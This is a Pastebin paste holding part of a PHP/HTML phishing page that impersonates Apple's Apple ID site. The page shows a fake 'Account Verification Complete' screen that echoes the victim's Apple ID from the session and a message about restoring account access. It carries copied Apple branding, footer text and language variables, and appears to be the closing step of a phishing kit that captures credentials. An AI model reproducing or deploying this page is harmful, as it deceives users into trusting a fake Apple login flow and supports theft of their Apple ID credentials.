  501. <span class="MobMenIcon-crust MobMenIcon-crust-top"></span> </span> <span class="MobMenIcon MobMenIcon-bottom">
  502. <span class="MobMenIcon-crust MobMenIcon-crust-bottom"></span> </span>
  503. </label>
  504. </li>
  505. <li class="HeaderObj">
  506. <a class="Item1" href="#" style="display: inline-block;margin-left:50%;margin-top:11px" id="ac-gn-firstfocus-small"> <span class="ac-gn-link-text">&nbsp;</span> </a>
  507. <a class="Item10" style="display: inline-block;float:right;margin-top:11px" href="#"> <span class="ac-gn-link-text">&nbsp;</span> <span class="ac-gn-bag-badge"></span> </a> <span class="ac-gn-bagview-caret ac-gn-bagview-caret-large"></span>
  508. </li>
  509. </ul>
  510. <ul class="HeaderObjList">
  511. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item1" href="#"></a></li>
  512. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item2" href="#"></a></li>
  513. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item3" href="#"></a></li>
  514. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item4" href="#"></a></li>
  515. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item5" href="#"></a></li>
  516. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item6" href="#"></a></li>
  517. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item7" href="#"></a></li>
  518. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item8" href="#"></a></li>
  519. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item9" href="#"></a></li>
  520. <li class="HeaderObj HeaderItem"><a class="HeaderLink Item10" href="#"></a></li>
  521. </ul>
  522. </div>
  523. </nav>
  524.  
  525.  
  526.  
  527. <div id="flow">
  528. <div class="flow-body signin clearfix" role="main">
  529. <div class="persona-splash no-photo clearfix">
  530.     <div class="persona-bg"></div>
  531.     <div class="container">
  532.         <div class="splash-section">
  533.             <div class=" person-wrapper">
  534.                 <div>
  535.                     <div class="row">
  536.                         <div class="col-sm-9 appleid-col">
  537.                             <div class="flex-container">
  538.                                 <h1 class="mobile appleid-user">
  539.                                     <span class="first_name">Account Verification</span>
  540.                                     <small class="SessionUser">Your Apple ID is <strong><?php echo $_SESSION['user'];?></strong> </small>
  541.                                 </h1>
  542.                             </div>
  543.                         </div>
  544.                         <div class="not-mobile col-sm-3">
  545.                             <div class="flex-container-signout">
  546.                                 <div class="signout pull-right">
  547.                                     <button class="btn btn-link">Sign Out </button>
  548.                                 </div>
  549.                             </div>
  550.                         </div>
  551.                     </div>
  552.                 </div>
  553.             </div>
  554.         </div>
  555.     </div>
  556. </div>
  557. <div class="container">
  558. <div class="flex home-content">
  559. <div class="container flow-sections">
  560. <div class="account-wrapper">
  561.   <div align="center">
  562.   <h1 style="color:#009CDE">Account Verification Complete</h1>
  563.     <p><span class="clearfix" style="margin-top: 10px;"><img src="assets/img/spin.GIF" height="42" width="42"></span></p>
  564.     <p>Please wait while we restore your account access...</p>
  565.     <p style="text-decoration: underline;color:red;">For your security you will automatically be logged out. </p>
  566.   </div>
  567. </div>
  568.  
  569.  
  570.  
  571. </div>
  572. </div>
  573. </div>
  574. </div>
  575. <footer>
  576. <div class="container">
  577. <div class="footer">
  578. <div class="footer-wrap">
  579. <div class="FooterLine1">
  580. <div class="line-level">Shop the <a href="#">Apple Online Store</a> (<?php echo $lang['APPCALL'];?>), visit an <a href="#">Apple Retail Store</a>, or find a <a href="#">reseller</a>.</div>
  581. </div>
  582. <div class="FooterLine2">
  583. <ul class="menu">
  584. <li class="item"><a href="#">Apple Info</a></li>
  585. <li class="item"><a href="#">Site Map</a></li>
  586. <li class="item"><a href="#">Hot News</a></li>
  587. <li class="item"><a href="#">RSS Feeds</a></li>
  588. <li class="item"><a href="#">Contact Us</a></li>
  589. <li class="item"><a class="choose" href="#"><img height="22" src="<?php echo $lang['FLAG'];?>" width="22"></a></li>
  590. </ul>
  591. </div>
  592. <div class="FooterLine3">Copyright © 2018 Apple Inc. All rights reserved.
  593. <ul class="menu">
  594. <li class="item"><a href="#">Terms of Use</a></li>
  595. <li class="item"><a href="#">Privacy Policy</a></li>
  596. </ul>
  597. </div>
  598. </div>
  599. </div>
  600. </div>
  601. </footer>
  602. </div>
  603. </div>
  604. </body>
  605. </html>
  606.  
  607. <?php } ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top